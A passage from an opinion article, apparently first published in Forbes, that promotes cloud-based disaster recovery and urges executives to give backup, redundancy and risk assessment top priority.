the cloud at immediate spin up or fail over time after an incident occurs. At its most basic level, disaster recovery in cloud computing is performed by replicating data from a primary site to a cloud service. In case of a disaster, the data can be failed over to a different environment and resources with minimal downtime. Many cloud computing services are provided on a pay-as-you-go basis and can be accessed from anywhere at any time. Other cloud resources can be reserved through longer commitments to help reduce costs. Perhaps the most important feature of cloud backup and disaster recovery systems is that these environments can be programmatically automated, requiring minimum input. With the right configuration in place, cloud-based disaster recovery will be able to restore your entire environment in just minutes or less. Cloud-based disaster recovery provides a powerful way for businesses of all sizes, whether they’re large corporations or startups without the resources on hand themselves, to protect against outage risks while continuing normal operations during emergencies. With the right approach, organizations can satisfy their recovery point objective (RPO) and recovery time objective (RTO) needs with cloud data recovery. It is important for organizations to evaluate each potential offering for factors such as reliability or recurring costs before committing any long-term investments into this area of business continuity planning. Prepping for Disasters The lessons for C-Levels are that disaster recovery, backup systems, and business continuity planning can no longer be regarded as luxuries, in today’s uncertain environment. Our duty as IT professionals is to build redundancy and disaster recovery to recover from such events. Redundancy is a critical IT principle, but when components begin to sequentially fail, returning to operation is an equally great critical business priority. The IT community must put value into routine risk assessments. Technology departments and the executives that drive organizations cannot wait to react if something goes wrong. Risk assessment and corresponding actions are top priorities that cannot be left to lower-level IT executives or staff. From beginning to end, CEOs, the entire C-suite, and the board must keep complete visibility and priority. The hyper-scale availability of cloud services in disaster recovery is one of the greatest innovations available to business today. Advanced computing and networking power is both simpler and more powerful than ever before and exponentially scalable when needed during emergencies and “SHTF” scenarios. Many companies will not need anything else but this one service: continuous remote deployment capabilities backed up seamlessly through off site storage facilities. With the power of a cloud that is everywhere when needed, a disaster mess is something that becomes much simpler and faster to navigate. Check out this piece, originally published in Forbes, here and follow me on LinkedIn.
